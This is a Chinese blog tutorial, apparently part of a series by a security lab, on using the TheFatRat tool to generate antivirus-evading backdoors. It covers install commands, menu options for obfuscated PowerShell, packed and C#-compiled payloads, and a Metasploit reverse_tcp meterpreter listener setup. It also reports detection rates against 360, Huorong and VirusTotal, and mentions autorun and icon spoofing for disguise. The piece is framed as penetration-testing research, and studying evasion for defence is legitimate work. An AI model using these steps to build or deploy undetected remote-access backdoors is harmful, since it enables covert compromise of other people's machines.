远控免杀专题(10)-TheFatRat免杀(VT免杀率22/70)
本專題文章導(dǎo)航
1、遠(yuǎn)控免殺專題(1)-基礎(chǔ)篇:https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg
2、遠(yuǎn)控免殺專題(2)-msfvenom隱藏的參數(shù):https://mp.weixin.qq.com/s/1r0iakLpnLrjCrOp2gT10w
3、遠(yuǎn)控免殺專題(3)-msf自帶免殺(VT免殺率35/69):https://mp.weixin.qq.com/s/A0CZslLhCLOK_HgkHGcpEA
4、遠(yuǎn)控免殺專題(4)-Evasion模塊(VT免殺率12/71):https://mp.weixin.qq.com/s/YnnCM7W20xScv52k_ubxYQ
5、遠(yuǎn)控免殺專題(5)-Veil免殺(VT免殺率23/71):https://mp.weixin.qq.com/s/-PHVIAQVyU8QIpHwcpN4yw
6、遠(yuǎn)控免殺專題(6)-Venom免殺(VT免殺率11/71):https://mp.weixin.qq.com/s/CbfxupSWEPB86tBZsmxNCQ
7、遠(yuǎn)控免殺專題(7)-Shellter免殺(VT免殺率7/69):https://mp.weixin.qq.com/s/ASnldn6nk68D4bwkfYm3Gg
8、遠(yuǎn)控免殺專題(8)-BackDoor-Factory免殺(VT免殺率13/71):https://mp.weixin.qq.com/s/A30JHhXhwe45xV7hv8jvVQ
9、遠(yuǎn)控免殺專題(9)-Avet免殺(VT免殺率14/71):https://mp.weixin.qq.com/s/EIfqAbMC8HoC6xcZP9SXpA
10、遠(yuǎn)控免殺專題(10)-TheFatRat免殺(VT免殺率22/70):本文
文章打包下載及相關(guān)軟件下載:https://github.com/TideSec/BypassAntiVirus
免殺能力一覽表
幾點(diǎn)說(shuō)明:
1、上表中標(biāo)識(shí) √ 說(shuō)明相應(yīng)殺毒軟件未檢測(cè)出病毒,也就是代表了Bypass。
2、為了更好的對(duì)比效果,大部分測(cè)試payload均使用msf的windows/meterperter/reverse_tcp模塊生成。
3、由于本機(jī)測(cè)試時(shí)只是安裝了360全家桶和火絨,所以默認(rèn)情況下360和火絨殺毒情況指的是靜態(tài)+動(dòng)態(tài)查殺。360殺毒版本5.0.0.8160(2020.01.01),火絨版本5.0.34.16(2020.01.01),360安全衛(wèi)士12.0.0.2002(2020.01.01)。
4、其他殺軟的檢測(cè)指標(biāo)是在virustotal.com(簡(jiǎn)稱VT)上在線查殺,所以可能只是代表了靜態(tài)查殺能力,數(shù)據(jù)僅供參考,不足以作為免殺的精確判斷指標(biāo)。
5、完全不必要苛求一種免殺技術(shù)能bypass所有殺軟,這樣的技術(shù)肯定是有的,只是沒(méi)被公開(kāi),一旦公開(kāi)第二天就能被殺了,其實(shí)我們只要能bypass目標(biāo)主機(jī)上的殺軟就足夠了。
一、TheFatRat介紹
TheFatRat創(chuàng)建的后門或者payload,可以在Linux,Windows,Mac和Android上等多種平臺(tái)上執(zhí)行,可生成exe、apk、sh、bat、py等多種格式。TheFatRat可以和msf無(wú)縫對(duì)接,并且集成內(nèi)置了Fudwin、Avoid、backdoor-factory等多個(gè)免殺工具,對(duì)powershell的免殺姿勢(shì)尤其多樣。
二、安裝TheFatRat
推薦使用linux操作系統(tǒng),如Kali、Parrot、Dracos、BackTrack、Backbox等。
1、Github安裝
安裝比較簡(jiǎn)單,首先從github上clone下來(lái)
git clone https://github.com/Screetsec/TheFatRat
然后進(jìn)入TheFatRat目錄
cd TheFatRat
執(zhí)行安裝命令
chmod +x setup.sh && ./setup.sh
在成功安裝后,可以查看TheFatRat/logs目錄下的setup.log文件,里面是TheFatRat需要的一些軟件和環(huán)境。
2、軟件升級(jí)
作者提供了升級(jí)的命令,可直接升級(jí)軟件
./update && chmod + x setup.sh && ./setup.sh
三、TheFatRat使用說(shuō)明
在安裝完成后,使用命令fatrat即可執(zhí)行,啟動(dòng)略慢。TheFatRat和專題9里的Avet一樣,也默認(rèn)不允許遠(yuǎn)程連接后執(zhí)行,只能在linux主機(jī)內(nèi)執(zhí)行。
運(yùn)行時(shí)會(huì)檢測(cè)一些軟件或環(huán)境是否已經(jīng)安裝
同時(shí)還會(huì)有個(gè)界面提醒大家不要把生成的后門上傳到virustotal.com上面,可以上傳到nodistribute.com(專門試了下,但上傳樣本一直不成功)。
之后就能看到啟動(dòng)后的界面了
常用創(chuàng)建后門菜單如下,我自己翻譯解釋了一下,有個(gè)別可能不太準(zhǔn)確。
[01] Create Backdoor with msfvenom #01:直接利用msf來(lái)生產(chǎn)后門,基本不能免殺
[02] Create Fud 100% Backdoor with Fudwin 1.0#02:使用Fudwin 1.0創(chuàng)建powershell后門,ps1利用powerstager混淆,從結(jié)果來(lái)看效果不錯(cuò)
[03] Create Fud Backdoor with Avoid v1.2 # 03: 使用Avoid v1.2創(chuàng)建后門
[04] Create Fud Backdoor with backdoor-factory [embed] #04:使用backdoor-factory創(chuàng)建后門
[05] Backdooring Original apk [Instagram, Line,etc] #05:生成安卓使用的apk后門
[06] Create Fud Backdoor 1000% with PwnWinds [Excelent] #06:綜合了多種方式,可生成bat、exe、dll、ps1等,可利用c、C#多種語(yǔ)言編譯,官方非常推薦,但經(jīng)嘗試免殺效果一般,肯定是被殺軟列入特征庫(kù)了
[07] Create Backdoor For Office with Microsploit #07:生成office類后門
[08] Trojan Debian Package For Remote Access [Trodebi]#08:生成linux后門
由于01是直接調(diào)用了msfvenom生成payload,只不過(guò)稍微進(jìn)行了多個(gè)msfvenom編碼,免殺效果肯定一般。
[01] Create Backdoor with msfvenom生成過(guò)程如下:
我這里就直接使用官方推薦的2和6進(jìn)行測(cè)試了。
四、使用TheFatRat生成ps1-exe(VT免殺率22/70)
在主菜單選擇2,進(jìn)入[02] Create Fud 100% Backdoor with Fudwin 1.0,選擇1,利用powerstager混淆,并將powershell編譯成exe。
在生成過(guò)程中可能會(huì)報(bào)錯(cuò),如下所示
這個(gè)時(shí)候需要去查看TheFatRat/logs目錄下的fudwin.log文件,看看什么報(bào)錯(cuò)信息。
我的第一次報(bào)錯(cuò)是因?yàn)閜ython沒(méi)有安裝named包,第二次報(bào)錯(cuò)是因?yàn)檩斎氲奈募麤](méi)有寫后綴,這里特別注意,必須寫后綴,不然會(huì)報(bào)錯(cuò)。
這樣就生成成功了。
在我本地機(jī)器上監(jiān)聽(tīng)3333端口
use exploit/multi/handlerset PAYLOAD windows/x64/meterpreter/reverse_tcpset LHOST 10.211.55.2set LPORT 3333exploit -j
在測(cè)試機(jī)器上執(zhí)行payload13.exe
雖然報(bào)錯(cuò),但可正常上線。
打開(kāi)殺軟進(jìn)行測(cè)試,雖然火絨靜態(tài)查殺沒(méi)查出來(lái),不過(guò)行為檢測(cè)查殺到了。360靜態(tài)和動(dòng)態(tài)都能查殺。(病毒庫(kù)均已更新到2020.01.01)
virustotal.com中22/70個(gè)報(bào)毒
五、使用TheFatRat生成加殼exe(VT免殺率12/70)
在主菜單選擇2,進(jìn)入[02] Create Fud 100% Backdoor with Fudwin 1.0,選擇2,slow but powerfull(慢但是有效)
輸入監(jiān)聽(tīng)ip和端口后,可能會(huì)報(bào)錯(cuò),也可能解密界面都消失,但其實(shí)后臺(tái)還在運(yùn)行.
看免殺過(guò)程,應(yīng)該是msfvenom一定編碼后進(jìn)行upx加殼,可能還有其他處理,想了解詳細(xì)過(guò)程的可以看下源碼。
等一段時(shí)間后,在/root/Fatrat_Generated/目錄下會(huì)發(fā)現(xiàn)生成了Powerfull.exe和Powerfull-fud.exe。
在測(cè)試機(jī)器運(yùn)行,火絨靜態(tài)動(dòng)態(tài)都可查殺,可正常上線
360動(dòng)態(tài)和靜態(tài)都沒(méi)有反應(yīng)
virustotal.com中12/70個(gè)報(bào)毒
六、使用TheFatRat編譯C#+powershell生成exe(VT免殺率37/71)
嘗試官方比較推薦的第6種方式[06] Create Fud Backdoor 1000% with PwnWinds [Excelent],進(jìn)入后菜單如下,我選擇2使用c#+powershell來(lái)生成exe
配置好ip和端口,選擇好監(jiān)聽(tīng)payload
生成成功
可正常上線
打開(kāi)殺軟,靜態(tài)檢測(cè)沒(méi)問(wèn)題,但行為檢測(cè)時(shí)360和火絨都報(bào)預(yù)警了。
virustotal.com中37/71個(gè)報(bào)毒
之后也嘗試了下生成bat和dll文件,免殺率大約在18/58和22/65。
四、小結(jié)
TheFatRat創(chuàng)建的后門格式和支持的平臺(tái)比較多樣化,而且還支持生成CDROM/U盤中能自動(dòng)運(yùn)行(生成AutoRun文件)的后門文件,并且可以對(duì)payload更改圖標(biāo),具有一定偽裝效果。
TheFatRat的很多免殺方式是借助于msfvenom編碼、upx等加殼壓縮、c/c#編譯等將powershell混淆后編譯成exe或bat文件,但有些在執(zhí)行時(shí)還是會(huì)調(diào)用powershell,而powershell的調(diào)用已經(jīng)被各大殺軟盯的很緊了,所以查殺效果只能算是一般了。
由于使用TheFatRat生成了多種payload,免殺效果各不相同,我就選了個(gè)折中一些的22/70作為TheFatRat的免殺代表。
五、參考資料
TheFatRat 一款簡(jiǎn)易后門工具:https://www.zhuanzhi.ai/document/22f6e03336336de7f211ac7b97c2fb0f
TheFatRat – 跨平臺(tái)反彈后門Shell生成神器:http://caidaome.com/?post=198
掃描下方二維碼學(xué)習(xí)更多WEB安全知識(shí):
Ms08067安全實(shí)驗(yàn)室
專注于普及網(wǎng)絡(luò)安全知識(shí)。團(tuán)隊(duì)已出版《Web安全攻防:滲透測(cè)試實(shí)戰(zhàn)指南》,《內(nèi)網(wǎng)安全攻防:滲透測(cè)試實(shí)戰(zhàn)指南》,目前在編Python滲透測(cè)試,JAVA代碼審計(jì)和二進(jìn)制逆向方面的書籍。
團(tuán)隊(duì)公眾號(hào)定期分享關(guān)于CTF靶場(chǎng)、內(nèi)網(wǎng)滲透、APT方面技術(shù)干貨,從零開(kāi)始、以實(shí)戰(zhàn)落地為主,致力于做一個(gè)實(shí)用的干貨分享型公眾號(hào)。
官方網(wǎng)站:www.ms08067.com
總結(jié)
以上是生活随笔為你收集整理的远控免杀专题(10)-TheFatRat免杀(VT免杀率22/70)的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: 深入理解golang 的栈
- 下一篇: 23年计算机408考研最新报考指南以及最